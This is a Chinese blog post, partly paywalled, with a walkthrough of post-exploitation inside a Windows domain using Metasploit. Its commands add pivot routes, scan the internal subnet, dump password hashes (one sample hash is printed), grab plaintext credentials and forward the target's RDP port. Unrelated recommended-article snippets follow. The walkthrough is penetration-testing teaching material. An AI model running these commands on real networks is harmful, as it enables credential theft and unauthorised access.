MSF 下域内渗透

最新推荐文章于 2024-06-02 14:54:06 发布
最新推荐文章于 2024-06-02 14:54:06 发布
阅读量334 收藏
点赞数 1
文章标签: sqlserver 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candour_0/article/details/129543428
版权

MSF 下域内渗透实战

先获取域内机器session

img

run get_local_subnets //获取本地网络子网掩码

route add 192.168.233.0 255.255.255.0 1 //添加路由表

run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由

run autoroute -s 192.168.2.0/24 //添加动态路由

route print //打印路由表

use auxliary/scanner/portscan/tcp //使用扫描模块对整个 C 段跨网段扫描

use priv //运行注入

run post/windows/gather/hashdump //获取用户名 hash 值

img

Administrator:500:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4

只要是管理员在线或者没有注销。我们可以抓取明文的

kerberos //管理员在线或者没有注销下获取明文

img

3.收集域环境信息+找到域控

利用msf 的端口转发功能来转发一下,然后登入对方的远程桌面看看。

meterpreter > portfwd add -l 2222 -r 127.0.0.1 -p 3389 //反弹 127.0.0.1 端口 3389 到本地 2222 并监听

meterpreter > portfwd

root@kali:~# netstat -an | grep “2222”

root@kali:~# rdesktop 127.0.0.1:2222

img

img

成功登录目标远程桌面。

最低0.47元/天 解锁文章
网络安全大菠萝
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MSF远程渗透windows主机
Cwillchris的博客
05-04 697
刚接触MSF的你本地已经学会了渗透,但是如何远程渗透,怎么做,今天教你,声明仅限教学 1、环境准备 准备好 kali linux (IP为192.168.98.30) Windows靶机(IP为192.168.98.150,可以是任意没有安装杀软的Windows机器,有兴趣的可以让不在一个局网的朋友配合一下) 2、申请免费公网隧道 打开Sunny网 ,注册个账号 按要求注册一个账号,然后登录 然后先仔细看教程,先进行实名认证,需要pay认证费用,且通过支付宝实名认证(防..
利用Metasploit Framework(msf)进行内网(渗透
初学者L_言的博客
07-03 4916
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
ATT&CK实战系列三(msf渗透
weixin_44155363的博客
08-01 1521
因为这次为黑盒测试,给了5个虚拟机,centos为出网机器,具体的ip配置如下: web-centos:192.168.93.100 外网:192.168.167.135 web-ubantu:192.168.93.120 win7:192.168.93.30 win2008:192.168.93.20 win2012:192.168.93.10 给ip是为了提前把网络调通,免得浪费不必要的时间,保证网络通畅后将其余ip视为不知,仅从web-centos开始; 就一个是双网卡,其余都是单网卡内网机器 c
渗透必看!MSF渗透实战
Appleteachers的博客
05-22 707
先获取内机器session run get_local_subnets //获取本地网络子网掩码 route add 192.168.233.0 255.255.255.0 1 //添加路由表 run autoroute -s 192.168.2.0 -n 255.255.255.0 //也可以添加一条静态路由 run autoroute -s 192.168.2.0/24 //添加动态路由 route print //打印路由表 use auxliary/scanner/portscan/tcp //
内网渗透-渗透
qq_44806973的博客
11-23 4413
内网渗透(渗透) 基础指南
记一次简单渗透(part 1)
初学者L_言的博客
11-12 2165
一、环境 环境是自己搭的,基本模仿的企业部署 :learn.com 操作系统类型 IP地址 本地账户/密码 账户/密码 角色 Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC控 win@2008.com win@2008.com
MSF实现远程渗透
WFC1006848997的博客
01-12 2439
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
msf 渗透测试
06-05
msf渗透
kali 渗透msf
11-14
kali渗透测试利器
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
msf内网渗透
记一次渗透实战思路分享
潇湘信安的博客
04-19 405
前几天帮朋友搞了一个,很久没有搞了感觉都快忘的差不多了,不过还好最终还是打穿了这个,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!应朋友的要求就不写文章了,整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家。
【redis】Spring之RedisTemplate配置与使用
05-30 330
转载:Spring之RedisTemplate配置与使用用过redis,但直接使用Jedis进行相应的交互操作,现在正好来看一下RedisTemplate是怎么实现的,以及使用起来是否更加便利。
如何mysql数据导入到mongdb
codemami的博客
05-30 1181
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
JIngJaneIL的博客
05-28 1199
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
行列视(RCV)能否在指定时间生成报表数据?
2401_83701843的博客
05-30 165
需要注意的是,要实现指定时间生成报表数据的功能,用户需要确保行列视(RCV)系统已经正确配置并连接了相应的数据源,同时还需要根据实际需求进行报表格式和计算逻辑的设置。此外,系统的稳定性和性能也是影响报表生成的重要因素,用户需要确保系统能够正常运行并处理大量的数据。其次,关于指定时间生成报表数据的需求,用户可以通过行列视(RCV)的定时任务功能来实现。综上所述,行列视(RCV)具备在指定时间生成报表数据的能力,但具体实现方式需要根据系统的配置和使用需求来确定。
chat4-Server端保存聊天消息到mysql
最新发布
gulanga5的博客
06-02 468
本文档描述了Server端接收到Client的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql服务端为当前客户端创建一个线程,此线程接收当前客户端的消息并转发给所有客户端或私发给某个客户端同时将聊天消息保存到mysql本文档主要总结了将聊天消息保存到mysql!!!),;import;import;import;/**用druid连接池来连接数据库的工具类*/DBUtil。
[解决]windows mysql8.0.x误删除root,解决办法
weixin_46626971的博客
05-29 183
b. 确保mysql安装路径下的data文件夹下的ibdata1文件有写入权限。,这在mysql8.0之后的版本已经不在试用了,所以改为输入。:a. 很多解决办法是输入。
msf渗透linux
09-07
MSF (Metasploit Framework) 是一个开源的渗透测试工具,用于评估和保护计算机系统的安全性。它提供了一系列的模块和工具,可以用于漏洞扫描、漏洞利用、远程控制和后渗透等活动。 在使用 MSF 进行 Linux 渗透测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值